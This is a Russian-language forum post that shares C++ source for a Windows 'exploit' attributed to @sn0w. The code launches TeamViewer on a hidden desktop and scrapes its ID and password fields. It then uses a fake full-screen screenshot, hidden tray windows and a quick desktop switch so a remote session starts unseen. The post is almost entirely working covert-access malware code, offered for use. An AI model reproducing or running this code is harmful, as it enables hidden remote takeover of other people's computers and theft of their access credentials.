вот такой вот эксплойт:
Автор сорца @sn0w
Скрытый контент для зарегистрированных пользователей.
Код:
#include <windows.h>
#include <tlhelp32.h>
#define TV_DESKTOP_NAME TEXT("MyNewTVDesktop")
#define FAKEWND_CLASS TEXT("vsfldlxcalm")
// RawSize == 0; .bss
static TCHAR g_login_fields[2][256];
static HWND g_mainTVwnd;
static HBITMAP g_fakeScreen;
static void my_exit(UINT code, LPCTSTR reason = NULL)
{
if(reason)
OutputDebugString(reason);
ExitProcess(code) ;
}
static LRESULT CALLBACK FakeWndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
int wmId, wmEvent;
switch (message)
{
case WM_PAINT:
PAINTSTRUCT ps;
HDC hdc;
BITMAP bitmap;
HDC hdcMem;
HGDIOBJ oldBitmap;
hdc = BeginPaint(hWnd, &ps);
hdcMem = CreateCompatibleDC(hdc);
oldBitmap = SelectObject(hdcMem, g_fakeScreen);
GetObject(g_fakeScreen, sizeof(bitmap), &bitmap);
BitBlt(hdc, 0, 0, bitmap.bmWidth, bitmap.bmHeight, hdcMem, 0, 0, SRCCOPY);
SelectObject(hdcMem, oldBitmap);
DeleteDC(hdcMem);
EndPaint(hWnd, &ps);
return 0;
}
return DefWindowProc(hWnd, message, wParam, lParam);
}
static DWORD WINAPI MakeFullscreenFakeWnd(LPVOID desk)
{
SetThreadDesktop((HDESK)desk);
WNDCLASSEX wcex;
wcex.cbSize = sizeof(WNDCLASSEX);
wcex.style = CS_HREDRAW | CS_VREDRAW;
wcex.lpfnWndProc = FakeWndProc;
wcex.cbClsExtra = 0;
wcex.cbWndExtra = 0;
wcex.hInstance = GetModuleHandle(0);
wcex.hIcon = NULL; //LoadIcon(hInstance, MAKEINTRESOURCE(IDI_FULL_SCREEN));
wcex.hCursor = LoadCursor(NULL, IDC_ARROW);
wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wcex.lpszMenuName = NULL; //MAKEINTRESOURCE(IDC_FULL_SCREEN);
wcex.lpszClassName = FAKEWND_CLASS;
wcex.hIconSm = NULL; //LoadIcon(wcex.hInstance, MAKEINTRESOURCE(IDI_SMALL));
RegisterClassEx(&wcex);
HWND hWnd;
hWnd = CreateWindow(FAKEWND_CLASS, NULL, WS_POPUP, 0, 0, GetSystemMetrics(SM_CXSCREEN),
GetSystemMetrics(SM_CYSCREEN), NULL, NULL, GetModuleHandle(0), NULL);
ShowWindow(hWnd, SW_SHOWMAXIMIZED);
SetWindowPos(hWnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE);
UpdateWindow(hWnd);
MSG msg;
while(GetMessage(&msg, hWnd, 0, 0))
DispatchMessage(&msg);
ExitThread(0);
}
static HBITMAP GetScreenshotHBitmap()
{
HDC hScreenDC = CreateDC(TEXT("DISPLAY"), NULL, NULL, NULL);
HDC hMemoryDC = CreateCompatibleDC(hScreenDC);
int width = GetDeviceCaps(hScreenDC, HORZRES);
int height = GetDeviceCaps(hScreenDC, VERTRES);
HBITMAP hBitmap = CreateCompatibleBitmap(hScreenDC, width, height);
HBITMAP hOldBitmap = (HBITMAP) SelectObject(hMemoryDC, hBitmap);
BitBlt(hMemoryDC, 0, 0, width, height, hScreenDC, 0, 0, SRCCOPY);
hBitmap = (HBITMAP) SelectObject(hMemoryDC, hOldBitmap);
DeleteDC(hMemoryDC);
DeleteDC(hScreenDC);
return hBitmap;
}
static BOOL CALLBACK DumpLogonFields(_In_ HWND hwnd, _In_ LPARAM lParam)
{
TCHAR str[256];
GetClassName(hwnd, str, sizeof(str));
if (!lstrcmp(str, TEXT("Edit")))
{
static size_t filled_up(0);
if (filled_up > 1)
return FALSE;
while (SendMessage(hwnd, WM_GETTEXTLENGTH, 0, 0) < 3)
Sleep(10);
SendMessage(hwnd, WM_GETTEXT, 256, (LPARAM)g_login_fields[filled_up]);
++filled_up;
}
return TRUE;
}
static BOOL CALLBACK DumpChildWindows(_In_ HWND hwnd, _In_ LPARAM lParam)
{
TCHAR str[256];
GetClassName(hwnd, str, sizeof(str));
if (!lstrcmp(str, TEXT("CustomRunner")))
EnumChildWindows(hwnd, DumpLogonFields, 0);
return TRUE;
}
static BOOL CALLBACK DumpThreadWindows(_In_ HWND hwnd, _In_ LPARAM lParam)
{
EnumChildWindows(hwnd, DumpChildWindows, 0);
return TRUE;
}
extern "C" void WinMainCRTStartup()
{
HDESK tvDesk, originalDesk;
originalDesk = GetThreadDesktop(GetCurrentThreadId());
tvDesk = CreateDesktop(TV_DESKTOP_NAME, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL); // DESKTOP_CREATEWINDOW | DELETE - not worx
SetThreadDesktop(tvDesk);
STARTUPINFO si{sizeof(STARTUPINFO), NULL, TV_DESKTOP_NAME};
PROCESS_INFORMATION pi;
TCHAR tv_cmdpath[MAX_PATH], userinit_path[MAX_PATH];
ExpandEnvironmentStrings(TEXT("%windir%\\system32\\userinit.exe"), userinit_path, MAX_PATH-1);
if (!CreateProcess(userinit_path, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
OutputDebugString(TEXT("Shell is not spawned!"));
WaitForSingleObject(pi.hThread, INFINITE);
GetTempPath(sizeof(tv_cmdpath), tv_cmdpath);
lstrcat(tv_cmdpath, TEXT("TeamViewer\\TeamViewer.exe --noInstallation --dre"));
if (!CreateProcess(NULL, tv_cmdpath, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
my_exit(1, TEXT("No TV dir in appdata/local/temp detected! exiting."));
while(1) // wait for TV window appeared on the new desktop (dont go back by SetThreadDesktop)
{
if(NULL != (g_mainTVwnd = FindWindow(NULL, TEXT("TeamViewer"))))
break;
Sleep(1000);
}
THREADENTRY32 trd_e{sizeof(trd_e)};
HANDLE thr_list(CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0));
if (INVALID_HANDLE_VALUE == thr_list)
my_exit(2, TEXT("cant retrieve thread list snap!"));
Thread32First(thr_list, &trd_e);
do
{
if (trd_e.th32OwnerProcessID == pi.dwProcessId)
{
EnumThreadWindows(trd_e.th32ThreadID, DumpThreadWindows, 0);
}
} while (Thread32Next(thr_list, &trd_e) && !g_login_fields[1][0]); // wait until second field will be filled up
CloseHandle(thr_list);
SetThreadDesktop(originalDesk); // go back to source desktop and report
CloseHandle(tvDesk);
TCHAR szReport[128];
wsprintf(szReport, TEXT("TeamViewer logon window dumped:\nid:\t%s\nkey:\t%s\n\nHit ok to switch desktop"),
g_login_fields[0], g_login_fields[1]);
MessageBox(0, szReport, TEXT("remote access test"), 0);
//
// remote control video stream wouldnt start until desktop isnt AN ACTIVE
//
// 'blink' exploit:
//
do
{
HWND hwndTray, tray_panel_wnd;
g_fakeScreen = GetScreenshotHBitmap(); // get from host desk
SetThreadDesktop(tvDesk);
if(FindWindow(TEXT("TrayNotificationBaseView"), TEXT("TV tray notification")))
break; // file transfer mode
CloseHandle(CreateThread(NULL, 0, MakeFullscreenFakeWnd, (LPVOID)tvDesk, 0, NULL));
hwndTray = FindWindow(TEXT("Shell_TrayWnd"), NULL );
tray_panel_wnd = FindWindow(TEXT("TV_ControlWin"), TEXT("TeamViewer Panel"));
ShowWindow(hwndTray, SW_HIDE);
MoveWindow(tray_panel_wnd, 5000, 5000, 200, 200, TRUE);
MoveWindow(g_mainTVwnd, 5000, 5000, 200, 200, TRUE);
SendMessage(hwndTray, WM_COMMAND, (WPARAM)419, 0 );
SwitchDesktop(tvDesk);
Sleep(1000);
// trigger it
SwitchDesktop(originalDesk);
}while(0);
my_exit(0);
}